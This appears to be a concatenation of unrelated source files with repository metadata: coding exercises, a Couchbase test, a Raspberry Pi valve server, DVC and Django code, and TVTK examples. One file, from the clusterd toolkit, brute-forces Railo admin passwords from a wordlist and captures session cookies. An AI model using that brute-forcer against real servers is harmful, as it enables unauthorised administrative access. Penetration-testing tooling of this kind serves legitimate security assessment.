➞ ["a", 1, "b", 2, "c", 3, "d", 4, "e", 5]
merge_arrays([1, 2, 3], ["a", "b", "c", "d", "e", "f"])
➞ [1, "a", 2, "b", 3, "c", "d", "e", "f"]
merge_arrays(["f", "d", "w", "t"], [5, 3, 7, 8])
➞ ["f", 5, "d", 3, "w", 7, "t", 8]
### Notes
N/A
"""
def merge_arrays(a, b):
    """Interleave *a* and *b*, then append the leftover tail of the longer one.

    Inputs are not modified; a new list is returned.
    """
    merged = []
    i = 0
    while i < len(a) or i < len(b):
        if i < len(a):
            merged.append(a[i])
        if i < len(b):
            merged.append(b[i])
        i += 1
    return merged
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
a9afdee321162791bb14de296c179bfd662c9631
|
46c31992b665615e410f1869b9f7a91ed57a2637
|
/couchbase/tests/cases/rget_t.py
|
c7a8cd4db499d9584d590617ed33a4396847008a
|
[
"Apache-2.0"
] |
permissive
|
what-studio/couchbase-python-client
|
4bca31917a519ad2d61bc93f37faa7f4af81d32d
|
1aa78f1559fe2407d664b7d5fd1f885359750147
|
refs/heads/master
| 2021-01-12T08:34:06.866811
| 2016-12-02T00:05:15
| 2016-12-02T16:31:24
| 76,612,814
| 1
| 1
| null | 2016-12-16T02:09:30
| 2016-12-16T02:09:29
| null |
UTF-8
|
Python
| false
| false
| 3,351
|
py
|
#
# Copyright 2013, Couchbase, Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from couchbase.exceptions import NotFoundError, ArgumentError
from couchbase.tests.base import MockTestCase
from couchbase.mockserver import MockControlClient
class ReplicaGetTest(MockTestCase):
def setUp(self):
super(ReplicaGetTest, self).setUp()
self.skipUnlessMock()
self.skipLcbMin("2.0.7")
self.mockclient = MockControlClient(self.mock.rest_port)
def test_get_kw(self):
key = self.gen_key("get_kw")
# Set on all replicas
self.mockclient.cache(key,
on_master=False,
replica_count=self.mock.replicas,
value=99,
cas=1234)
self.assertRaises(NotFoundError,
self.cb.get, key)
rv = self.cb.get(key, replica=True)
self.assertTrue(rv.success)
self.assertEqual(rv.value, 99)
def _check_single_replica(self, ix):
key = self.gen_key("get_kw_ix")
# Ensure the key is removed...
self.mockclient.purge(key,
on_master=True,
replica_count=self.mock.replicas)
# Getting it should raise an error
self.assertRaises(NotFoundError, self.cb.get, key)
# So should getting it from any replica
self.assertRaises(NotFoundError, self.cb.rget, key)
# And so should getting it from a specific index
for jx in range(self.mock.replicas):
self.assertRaises(NotFoundError, self.cb.rget, key,
replica_index=jx)
# Store the key on the desired replica
self.mockclient.cache(key,
on_master=False,
replicas=[ix],
value=ix,
cas=12345)
# Getting it from a replica should ultimately succeed
self.cb.get(key, replica=True)
rv = self.cb.rget(key)
self.assertTrue(rv.success)
self.assertEqual(rv.value, ix)
# Getting it from our specified replica should succeed
rv = self.cb.rget(key, replica_index=ix)
self.assertTrue(rv.success)
self.assertEqual(rv.value, ix)
# Getting it from any other replica should fail
for jx in range(self.mock.replicas):
if jx == ix:
continue
self.assertRaises(NotFoundError,
self.cb.rget,
key,
replica_index=jx)
def test_get_ix(self):
key = self.gen_key("get_kw_ix")
for ix in range(self.mock.replicas):
self._check_single_replica(ix)
|
[
"mnunberg@haskalah.org"
] |
mnunberg@haskalah.org
|
43196f723a7336bcf3a95d9474d07b8fbaf707fd
|
e72c937f783e79f41468d992fead4e2085de1775
|
/src/week 4/day 3/using_object_main.py
|
159e6f58b74160936df6aa2ce755b28005e8a72b
|
[] |
no_license
|
NoroffNIS/Python_Examples
|
13dac7313472a9cdefe66a61302f4024a4a8af0f
|
ffab09002d3549e6f440a303fccc0fd61bb80472
|
refs/heads/master
| 2021-04-26T06:04:33.034864
| 2018-01-03T13:26:19
| 2018-01-03T13:26:19
| 59,116,302
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 179
|
py
|
from objects import *

# NOTE(review): `my_object` is bound to the ClassName *class itself*, not an
# instance (no parentheses) — presumably why the methods below are called
# with the object passed in explicitly; confirm this is intentional.
my_object = ClassName
print(my_object.__doc__)             # class docstring
print(my_object.class_variable)      # class-level attribute
my_object.class_method(my_object)
my_object.print_class_variable(my_object)
|
[
"brage89@gmail.com"
] |
brage89@gmail.com
|
7b1f66dd10d8d19462a808b9915411777c07b644
|
e1292fb9f2b359f71fbc54a4eb6ae4cf0c1ff51d
|
/machines/rasppi32/socket_server.py
|
18c67fe41ecbe2ebc0ace9dc89691c92450be8f2
|
[] |
no_license
|
JNRiedel/PyExpLabSys
|
879d5c6bf552e89134629f0c6ca011af67937c3d
|
b69daaa9c932b9264d9f731cc3f2091f31f5d36e
|
refs/heads/master
| 2020-04-08T08:45:17.466865
| 2014-08-22T11:06:24
| 2014-08-22T11:06:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,797
|
py
|
""" Socket server for valve-control box """
import time
import SocketServer
import wiringpi2 as wp
class MyUDPHandler(SocketServer.BaseRequestHandler):
    """UDP handler: "read" returns all channel states; "set_state_N V" sets one."""

    def handle(self):
        # For UDP servers, self.request is (datagram, socket).
        received_data = self.request[0].strip()
        data = "test"
        socket = self.request[1]
        if received_data == "read":
            print "read_all"
            # Reply with the 20 channel states concatenated as a 0/1 string.
            data = ''
            for i in range(0, 20):
                data += str(wp.digitalRead(i))
        # Channels 1..9: command prefix "set_state_N" is 11 characters.
        for i in range(0, 9):
            if (received_data[0:11] == "set_state_" + str(i + 1)):
                val = received_data[11:].strip()
                if val == '0':
                    wp.digitalWrite(i, 0)
                    data = "ok"
                if val == '1':
                    wp.digitalWrite(i, 1)
                    data = "ok"
        # Channels 10..20: prefix "set_state_NN" is 12 characters.
        for i in range(9, 20):
            if (received_data[0:12] == "set_state_" + str(i + 1)):
                val = received_data[12:].strip()
                if val == '0':
                    wp.digitalWrite(i, 0)
                    data = "ok"
                if val == '1':
                    wp.digitalWrite(i, 1)
                    data = "ok"
        # Echo the result ("ok", the state string, or "test" if unmatched).
        socket.sendto(data, self.client_address)
if __name__ == "__main__":
wp.wiringPiSetup()
time.sleep(1)
for index in range(0, 21): # Set GPIO pins to output
wp.pinMode(index, 1)
wp.digitalWrite(index, 0)
# Now that all output are low, we can open main safety output
wp.digitalWrite(20, 1)
for index in range(0, 21): # Set GPIO pins to output
wp.digitalWrite(index, 1)
HOST, PORT = "10.54.7.32", 9999 # Rasppi33
server = SocketServer.UDPServer((HOST, PORT), MyUDPHandler)
server.serve_forever()
|
[
"jensen.robert@gmail.com"
] |
jensen.robert@gmail.com
|
18764b8e0e245a262c3d95f37922342280da279e
|
54f352a242a8ad6ff5516703e91da61e08d9a9e6
|
/Source Codes/AtCoder/agc015/B/4420123.py
|
e240646ff0645ed09389907878e7f5bc4ba5d2a1
|
[] |
no_license
|
Kawser-nerd/CLCDSA
|
5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb
|
aee32551795763b54acb26856ab239370cac4e75
|
refs/heads/master
| 2022-02-09T11:08:56.588303
| 2022-01-26T18:53:40
| 2022-01-26T18:53:40
| 211,783,197
| 23
| 9
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 158
|
py
|
s = input()
n = len(s)
ans = 0
for i, c in enumerate(s):
ans += n-1
if c == "U":
ans += i
else:
ans += n-1 - i
print(ans)
|
[
"kwnafi@yahoo.com"
] |
kwnafi@yahoo.com
|
3acd29f1a10016eb1f86cb5cf195ad30bb94dd36
|
e79de9c9def60b0f814ab0625a2eb8bce3428ddd
|
/challenges/own/operas/operas_solution.py
|
0f21f23d8e6186991dd3ca538f90015a1629a287
|
[] |
no_license
|
mh70cz/py_old
|
a80e2140a279541c3639f89df70fadad34f7df0f
|
1af878cfbff24e5c6d39219c2c4faebd5a12f0c4
|
refs/heads/master
| 2022-04-05T15:07:10.840387
| 2020-01-13T18:39:50
| 2020-01-13T18:39:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,202
|
py
|
"""
For two given composers find operas (one of composers is the author)
at which premiere both could have been together (i.e. they both had to be alive).
Just a theoretical possibility of presence is considered
"""
from datetime import datetime
composers = {
"beethoven": ("Ludwig van Beethoven", "17 December 1770", "26 March 1827"),
"wagner": ("Richard Wagner", "22 May 1813", "13 February 1883"),
"verdi": ("Giuseppe Verdi", "9 October 1813", "27 January 1901"),
"mozart": ("Wolfgang Amadeus Mozart", "27 January 1756", "5 December 1791"),
}
operas = [
("mozart", "Apollo and Hyacinth", "13 May 1767"),
("mozart", "Marriage of Figaro", "1 May 1786"),
("mozart", "Don Giovanni", "29 October 1787"),
("mozart", "Così fan tutte", "6 January 1790"),
("mozart", "The Clemency of Titus", "6 September 1791"),
("mozart", "The Magic Flute", "30 September 1791"),
("wagner", "The Fairies", "29 June 1888"),
("wagner", "Rienzi", "20 October 1842"),
("wagner", "The Flying Dutchman", "2 January 1843"),
("wagner", "Tannhäuser", "19 October 1845"),
("wagner", "Lohengrin", "28 August 1850"),
("wagner", "The Rhinegold", "22 September 1869"),
("wagner", "The Valkyrie", "26 June 1870"),
("wagner", "Siegfried", "16 August 1876"),
("wagner", "Twilight of the Gods", "17 August 1876"),
("wagner", "Tristan and Isolde", "10 June 1865"),
("wagner", "The Master-Singers of Nuremberg", "21 June 1868"),
("wagner", "Parsifal", "26 July 1882"),
("beethoven", "Fidelio", "20 November 1805"),
("verdi", "Nabucco", "9 March 1842"),
("verdi", "Ernani", "9 March 1844"),
("verdi", "Macbeth", "14 March 1847"),
("verdi", "Il corsaro", "25 October 1848"),
("verdi", "Rigoletto", "11 March 1851"),
("verdi", "La traviata", "6 March 1853"),
("verdi", "Aroldo", "16 August 1857"),
("verdi", "Macbeth", "21 April 1865"),
("verdi", "Don Carlos", "11 March 1867"),
("verdi", "Aida", "24 December 1871"),
("verdi", "Otello", "5 February 1887"),
("verdi", "Falstaff", "9 February 1893"),
]
def _get_date(date_str):
return datetime.date(datetime.strptime(date_str, "%d %B %Y"))
def operas_both_at_premiere(guest, composer, operas=operas):
""" Returns a list of operas,
where the guest and the composer could have been together at premiere.
Args:
guest (str): one of the composers but not the author of an opera
composer (str): the author of an opera
operas (list): list of operas
Returns a list of titles of operas.
"""
if guest not in composers.keys():
raise ValueError("guest is not in composers")
if composer not in composers.keys():
raise ValueError("composer is not in composers")
at_premiere = []
guest_born = _get_date(composers[guest][1])
guest_died = _get_date(composers[guest][2])
composer_died = _get_date(composers[composer][2])
for opera in operas:
if opera[0] == composer:
premiere = _get_date(opera[2])
if (guest_born < premiere < guest_died) and (premiere < composer_died):
at_premiere.append(opera[1])
return at_premiere
|
[
"mh70@mh70.cz"
] |
mh70@mh70.cz
|
a643359cdc06e3dad758fb3aebf4acc8e8ccfee6
|
5e48c355308cfe3fe84835f3d56218a53f7968cd
|
/dvc/parsing/__init__.py
|
b173de4384e38b7898d811d2d2e19cb55d2b293d
|
[
"Apache-2.0"
] |
permissive
|
imhardikj/dvc
|
97b6637f75d90e9f3f708211aec07e3da2fa205f
|
911534116e4f870f87b05caf2bed38e105a205ad
|
refs/heads/master
| 2023-01-05T04:01:46.308634
| 2020-10-29T09:01:34
| 2020-10-29T09:01:34
| 264,737,803
| 0
| 0
|
Apache-2.0
| 2020-05-17T19:08:07
| 2020-05-17T19:08:06
| null |
UTF-8
|
Python
| false
| false
| 3,764
|
py
|
import logging
import os
from collections import defaultdict
from copy import deepcopy
from itertools import starmap
from typing import TYPE_CHECKING
from funcy import first, join
from dvc.dependency.param import ParamsDependency
from dvc.path_info import PathInfo
from dvc.utils.serialize import dumps_yaml
from .context import Context
from .interpolate import resolve
if TYPE_CHECKING:
from dvc.repo import Repo
logger = logging.getLogger(__name__)
STAGES_KWD = "stages"
USE_KWD = "use"
VARS_KWD = "vars"
WDIR_KWD = "wdir"
DEFAULT_PARAMS_FILE = ParamsDependency.DEFAULT_PARAMS_FILE
PARAMS_KWD = "params"
class DataResolver:
def __init__(self, repo: "Repo", wdir: PathInfo, d: dict):
to_import: PathInfo = wdir / d.get(USE_KWD, DEFAULT_PARAMS_FILE)
vars_ = d.get(VARS_KWD, {})
vars_ctx = Context(vars_)
if os.path.exists(to_import):
self.global_ctx_source = to_import
self.global_ctx = Context.load_from(repo.tree, str(to_import))
else:
self.global_ctx = Context()
self.global_ctx_source = None
logger.debug(
"%s does not exist, it won't be used in parametrization",
to_import,
)
self.global_ctx.merge_update(vars_ctx)
self.data: dict = d
self.wdir = wdir
self.repo = repo
def _resolve_entry(self, name: str, definition):
context = Context.clone(self.global_ctx)
return self._resolve_stage(context, name, definition)
def resolve(self):
stages = self.data.get(STAGES_KWD, {})
data = join(starmap(self._resolve_entry, stages.items()))
logger.trace("Resolved dvc.yaml:\n%s", dumps_yaml(data))
return {STAGES_KWD: data}
def _resolve_stage(self, context: Context, name: str, definition) -> dict:
definition = deepcopy(definition)
wdir = self._resolve_wdir(context, definition.get(WDIR_KWD))
if self.wdir != wdir:
logger.debug(
"Stage %s has different wdir than dvc.yaml file", name
)
contexts = []
params_yaml_file = wdir / DEFAULT_PARAMS_FILE
if self.global_ctx_source != params_yaml_file:
if os.path.exists(params_yaml_file):
contexts.append(
Context.load_from(self.repo.tree, str(params_yaml_file))
)
else:
logger.debug(
"%s does not exist for stage %s", params_yaml_file, name
)
params_file = definition.get(PARAMS_KWD, [])
for item in params_file:
if item and isinstance(item, dict):
contexts.append(
Context.load_from(self.repo.tree, str(wdir / first(item)))
)
context.merge_update(*contexts)
logger.trace( # pytype: disable=attribute-error
"Context during resolution of stage %s:\n%s", name, context
)
with context.track():
stage_d = resolve(definition, context)
params = stage_d.get(PARAMS_KWD, []) + self._resolve_params(
context, wdir
)
if params:
stage_d[PARAMS_KWD] = params
return {name: stage_d}
def _resolve_params(self, context: Context, wdir):
tracked = defaultdict(set)
for src, keys in context.tracked.items():
tracked[str(PathInfo(src).relative_to(wdir))].update(keys)
return [{file: list(keys)} for file, keys in tracked.items()]
def _resolve_wdir(self, context: Context, wdir: str = None) -> PathInfo:
if not wdir:
return self.wdir
wdir = resolve(wdir, context)
return self.wdir / str(wdir)
|
[
"noreply@github.com"
] |
imhardikj.noreply@github.com
|
ac3f36b00c738fcffba08b38b22ace5d60c3a19f
|
2656f92d8329bc1b28188802badc7b3a945fa978
|
/src/platform/railo/authenticate.py
|
8ee7b6a90b019f5aa138fc25923c9a2625b4583e
|
[
"MIT"
] |
permissive
|
koutto/clusterd
|
81828698574bc7301cd4eb0ad87d3115ddf74612
|
93db0a50210dcc6147c3122a539104a36e92f02b
|
refs/heads/master
| 2020-05-03T17:51:55.430955
| 2019-03-31T23:20:22
| 2019-03-31T23:20:22
| 178,751,876
| 2
| 1
|
MIT
| 2019-03-31T23:04:14
| 2019-03-31T23:04:13
| null |
UTF-8
|
Python
| false
| false
| 2,588
|
py
|
from src.platform.railo.interfaces import RINTERFACES
from requests.utils import dict_from_cookiejar
from collections import OrderedDict
from sys import stdout
from log import LOG
import state
import utility
def _auth(pswd, url, title):
""" Support auth for both the web and server interfaces
"""
data = OrderedDict([
("lang", "en"),
("rememberMe", "yyyy"),
("submit", "submit")
])
if title is RINTERFACES.WEB:
data["login_passwordweb"] = pswd
elif title is RINTERFACES.SRV:
data['login_passwordserver'] = pswd
response = utility.requests_post(url, data=data)
if response.status_code is 200 and "login.login_password" not in response.content:
utility.Msg("Successfully authenticated with '%s'" % pswd, LOG.DEBUG)
return dict_from_cookiejar(response.cookies)
def checkAuth(ip, port, title):
""" Railo doesn't have usernames, so we only care about passwords
"""
url = None
if title is RINTERFACES.WEB:
url = "http://{0}:{1}/railo-context/admin/web.cfm".format(ip, port)
elif title is RINTERFACES.SRV:
url = "http://{0}:{1}/railo-context/admin/server.cfm".format(ip, port)
else:
utility.Msg("Interface %s not supported yet." % title, LOG.DEBUG)
return
if state.usr_auth:
# check with given auth; handle both cases of "default" and ":default"
if ':' in state.usr_auth:
(_, pswd) = state.usr_auth.split(":")
else:
pswd = state.usr_auth
return _auth(pswd, url, title)
if state.bf_wordlist and not state.hasbf:
state.hasbf = True
wordlist = []
with open(state.bf_wordlist, "r") as f:
wordlist = [x.decode("ascii", "ignore").rstrip() for x in f.readlines()]
utility.Msg("Brute forcing %s with %d passwords..." % (state.bf_user,
len(wordlist)), LOG.DEBUG)
try:
for (idx, word) in enumerate(wordlist):
stdout.flush()
stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m"
% (utility.timestamp(), state.bf_user, idx+1, len(wordlist)))
cook = _auth(word, url, title)
if cook:
print ''
utility.Msg("Successful login with %s" % word, LOG.SUCCESS)
return cook
print ''
except KeyboardInterrupt:
pass
|
[
"shodivine@gmail.com"
] |
shodivine@gmail.com
|
668781a6f78564088417314c29bba0050a82a1a5
|
8d55d3a52ed6dc8111801cea9c7c9d0a84be736b
|
/src/1392.longest-happy-prefix.py
|
3b5ddbab31d9da69b9465e8818f5c3b68d1a952b
|
[] |
no_license
|
mic0ud/Leetcode-py3
|
2a23270034ec470571e57c498830b93af813645f
|
61fabda324338e907ce3514ae8931c013b8fe401
|
refs/heads/master
| 2022-12-26T11:52:31.666395
| 2020-09-27T19:27:10
| 2020-09-27T19:27:10
| 297,135,944
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,748
|
py
|
#
# @lc app=leetcode id=1392 lang=python3
#
# [1392] Longest Happy Prefix
#
# https://leetcode.com/problems/longest-happy-prefix/description/
#
# algorithms
# Hard (39.14%)
# Likes: 191
# Dislikes: 15
# Total Accepted: 8K
# Total Submissions: 20.1K
# Testcase Example: '"level"'
#
# A string is called a happy prefix if is a non-empty prefix which is also a
# suffix (excluding itself).
#
# Given a string s. Return the longest happy prefix of s .
#
# Return an empty string if no such prefix exists.
#
#
# Example 1:
#
#
# Input: s = "level"
# Output: "l"
# Explanation: s contains 4 prefix excluding itself ("l", "le", "lev", "leve"),
# and suffix ("l", "el", "vel", "evel"). The largest prefix which is also
# suffix is given by "l".
#
#
# Example 2:
#
#
# Input: s = "ababab"
# Output: "abab"
# Explanation: "abab" is the largest prefix which is also suffix. They can
# overlap in the original string.
#
#
# Example 3:
#
#
# Input: s = "leetcodeleet"
# Output: "leet"
#
#
# Example 4:
#
#
# Input: s = "a"
# Output: ""
#
#
#
# Constraints:
#
#
# 1 <= s.length <= 10^5
# s contains only lowercase English letters.
#
#
#
# @lc code=start
class Solution:
def longestPrefix(self, s: str) -> str:
sp = self.suffix_prefix(s)
return s[:sp[-1]]
def suffix_prefix(self, s) -> [int]:
res, i = [0], 0
for j in range(1, len(s)):
while i > 0 and s[i] != s[j]:
i = res[i-1]
if s[i] == s[j]:
res.append(i+1)
i += 1
else:
res.append(0)
return res
# @lc code=end
if __name__ == '__main__':
s = Solution()
s.longestPrefix("levele")
s.longestPrefix("leetcodeleet")
|
[
"ebizui@gmail.com"
] |
ebizui@gmail.com
|
0b0904c3cb0fa4f9689e280d90bb751078b85fb6
|
3474b315da3cc5cb3f7823f19a18b63a8da6a526
|
/scratch/KRAMS/src/apps/scratch/faezeh/lab/cell_lab/shell.py
|
93472192968f601cf1db0bcfe727b1175ea20d64
|
[] |
no_license
|
h4ck3rm1k3/scratch
|
8df97462f696bc2be00f1e58232e1cd915f0fafd
|
0a114a41b0d1e9b2d68dbe7af7cf34db11512539
|
refs/heads/master
| 2021-01-21T15:31:38.718039
| 2013-09-19T10:48:24
| 2013-09-19T10:48:24
| 29,173,525
| 0
| 0
| null | 2015-01-13T04:58:57
| 2015-01-13T04:58:56
| null |
UTF-8
|
Python
| false
| false
| 3,462
|
py
|
'''
(C)2004 ORFEUS
This is the default python module file. It has been generated
by the modtree administrator
Import the generated Python module in order to
- initialize the required modules and
- load the compiled module extension library of this module
'''
# Here you can add your own code ...
#!/usr/bin/env python
"""A simple example demonstrating how one can use numpy arrays
transparently with TVTK.
"""
# Author: Prabhu Ramachandran and Eric Jones
# Copyright (c) 2004-2007, Enthought, Inc.
# License: BSD Style.
from enthought.tvtk.api import tvtk
from numpy import array
temperature = tvtk.DoubleArray()
temperature.insert_next_value(0.)
temperature.insert_next_value(20.)
temperature.insert_next_value(0.)
temperature.insert_next_value(0.)
temperature.insert_next_value(0.)
temperature.insert_next_value(0.)
temperature.insert_next_value(0.)
temperature.insert_next_value(0.)
#temp_array.append(temp2)
### TVTK PIPELINE
# create a render window and hand it the renderer
render_window = tvtk.RenderWindow(size=(400,400))
# create a renderer
renderer = tvtk.Renderer(background=(0.839216, 0.839216, 0.839216))
render_window.add_renderer(renderer)
# create interactor and hand it the render window
# This handles mouse interaction with window.
interactor = tvtk.RenderWindowInteractor(render_window=render_window)
points_arr = tvtk.Points()
#points_arr.insert_point(0, -1, -1, 0)
#points_arr.insert_point(1, 1, -1, 0)
#points_arr.insert_point(2, 1, 1, 0)
#points_arr.insert_point(3, -1, 1, 0)
#points_arr.insert_point(0, 0., 0., 0.)
#points_arr.insert_point(1, 0.5, 0., 1.)
#points_arr.insert_point(2, 1., 0., 0.)
#points_arr.insert_point(3, 1., 0.5, 0.)
#points_arr.insert_point(4, 1, 1., 0.)
#points_arr.insert_point(5, 0.5, 1, 1.)
#points_arr.insert_point(6, 0, 1., 0.)
#points_arr.insert_point(7, 0., 0.5, 0.)
points_arr.insert_point(0, 0., 0., 0.)
points_arr.insert_point(1, 1., 0., 0.)
points_arr.insert_point(2, 1., 1., 0.)
points_arr.insert_point(3, 0., 1., 0.)
points_arr.insert_point(4, 0.5, 0., 0.)
points_arr.insert_point(5, 1, 0.5, 0.)
points_arr.insert_point(6, 0.5, 1., 0.)
points_arr.insert_point(7, 0., 0.5, 0.)
#points_arr.insert_point(4, 1.5, 0., 0.)
#points_arr.insert_point(5, 2, 0.5, 0.)
#points_arr.insert_point(6, 1.5, 1., 0.)
#points_arr.insert_point(7, 1., 0.5, 0.)
quad = tvtk.QuadraticQuad()
quad._get_point_ids().set_id(0, 0)
quad._get_point_ids().set_id(1, 1)
quad._get_point_ids().set_id(2, 2)
quad._get_point_ids().set_id(3, 3)
quad._get_point_ids().set_id(4, 4)
quad._get_point_ids().set_id(5, 5)
quad._get_point_ids().set_id(6, 6)
quad._get_point_ids().set_id(7, 7)
#define array
polys = tvtk.CellArray()
#connect a cell to the array
polys.insert_next_cell(quad)
# Create a mesh from the data created above.
#mesh = tvtk.PolyData(points = points_arr,polys = polys)
mesh = tvtk.UnstructuredGrid()
mesh.insert_next_cell(quad.cell_type,quad._get_point_ids() )
mesh.points = points_arr
mesh.point_data.scalars = temperature
# Set the mapper to scale temperature range
# across the entire range of colors
#mapper = tvtk.PolyDataMapper(input=mesh)
mapper = tvtk.DataSetMapper(input=mesh)
# Create mesh actor for display
actor = tvtk.Actor(mapper=mapper)
actor.property.color=(1, 0, 0)
actor.property.point_size=(200.)
actor.property.line_width=(200.)
# Now add the actors to the renderer and start the interaction.
renderer.add_actor(actor)
interactor.initialize()
interactor.start()
|
[
"Axel@Axel-Pc"
] |
Axel@Axel-Pc
|
70476e212daa4321863e86fabbc6752a86a59967
|
d5219de4d3e4bef5c8c71e209158dd92d4f8a011
|
/project/config/settings/common.py
|
a1d862bdb54494fd64d57ad3cdfcf6166a07ffa9
|
[
"MIT"
] |
permissive
|
ilmoeuro/asylum
|
1932de32ae6db6b34d1609775d5ff9037130fe02
|
88d48d59cba58738bf141142bae7d1182cf4d5e7
|
refs/heads/master
| 2021-01-24T23:13:09.090463
| 2015-11-27T21:56:21
| 2015-11-27T21:56:21
| 47,000,716
| 1
| 0
| null | 2015-11-27T21:53:40
| 2015-11-27T21:53:40
| null |
UTF-8
|
Python
| false
| false
| 8,123
|
py
|
# -*- coding: utf-8 -*-
"""
Django settings for asylum project.
For more information on this file, see
https://docs.djangoproject.com/en/dev/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/dev/ref/settings/
"""
from __future__ import absolute_import, unicode_literals
import os.path
import environ
ROOT_DIR = environ.Path(__file__) - 3 # (/a/b/myfile.py - 3 = /)
APPS_DIR = ROOT_DIR.path('asylum')
env = environ.Env()
# If the project root contains a .env file, read it
if os.path.isfile(str(ROOT_DIR + '.env')):
environ.Env.read_env(str(ROOT_DIR + '.env'))
# APP CONFIGURATION
# ------------------------------------------------------------------------------
DJANGO_APPS = (
# Default Django apps:
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Useful template tags:
# 'django.contrib.humanize',
# Admin
'django.contrib.admin',
)
THIRD_PARTY_APPS = (
'crispy_forms', # Form layouts
)
# Apps specific for this project go here.
LOCAL_APPS = (
# Your stuff: custom apps go here
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps
INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS
# MIDDLEWARE CONFIGURATION
# ------------------------------------------------------------------------------
MIDDLEWARE_CLASSES = (
# Make sure djangosecure.middleware.SecurityMiddleware is listed first
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
# MIGRATIONS CONFIGURATION
# ------------------------------------------------------------------------------
MIGRATION_MODULES = {
'sites': 'asylum.contrib.sites.migrations'
}
# DEBUG
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = env.bool("DJANGO_DEBUG", False)
# FIXTURE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS
FIXTURE_DIRS = (
str(APPS_DIR.path('fixtures')),
)
# EMAIL CONFIGURATION
# ------------------------------------------------------------------------------
EMAIL_BACKEND = env('DJANGO_EMAIL_BACKEND', default='django.core.mail.backends.smtp.EmailBackend')
# MANAGER CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#admins
ADMINS = (
("""Anders Innovations""", 'support@anders.fi'),
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#managers
MANAGERS = ADMINS
# DATABASE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = {
# Raises ImproperlyConfigured exception if DATABASE_URL not in os.environ
'default': env.db("DATABASE_URL", default="postgres:///asylum"),
}
DATABASES['default']['ATOMIC_REQUESTS'] = True
# GENERAL CONFIGURATION
# ------------------------------------------------------------------------------
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'Europe/Helsinki'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code
LANGUAGE_CODE = 'fi-FI'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id
SITE_ID = 1
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n
USE_I18N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n
USE_L10N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz
USE_TZ = True
# TEMPLATE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#templates
_TEMPLATE_CONTEXT_PROCESSORS = [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
# Your stuff: custom template context processors go here
]
TEMPLATES = [
{
'BACKEND': "django_jinja.backend.Jinja2",
'APP_DIRS': False,
'DIRS': [
str(APPS_DIR.path('templates')),
],
'OPTIONS': {
'match_extension': '.jinja',
'context_processors': _TEMPLATE_CONTEXT_PROCESSORS,
'newstyle_gettext': True
}
},
{
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-TEMPLATES-BACKEND
'BACKEND': 'django.template.backends.django.DjangoTemplates',
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
'APP_DIRS': False,
'DIRS': [
str(APPS_DIR.path('templates')),
],
'OPTIONS': {
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
'debug': DEBUG,
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-loaders
# https://docs.djangoproject.com/en/dev/ref/templates/api/#loader-types
'loaders': [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
],
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors
'context_processors': _TEMPLATE_CONTEXT_PROCESSORS,
},
},
]
# See: http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs
CRISPY_TEMPLATE_PACK = 'bootstrap3'
# STATIC FILE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = str(ROOT_DIR('staticfiles'))
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = '/static/'
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = (
str(APPS_DIR.path('static')),
)
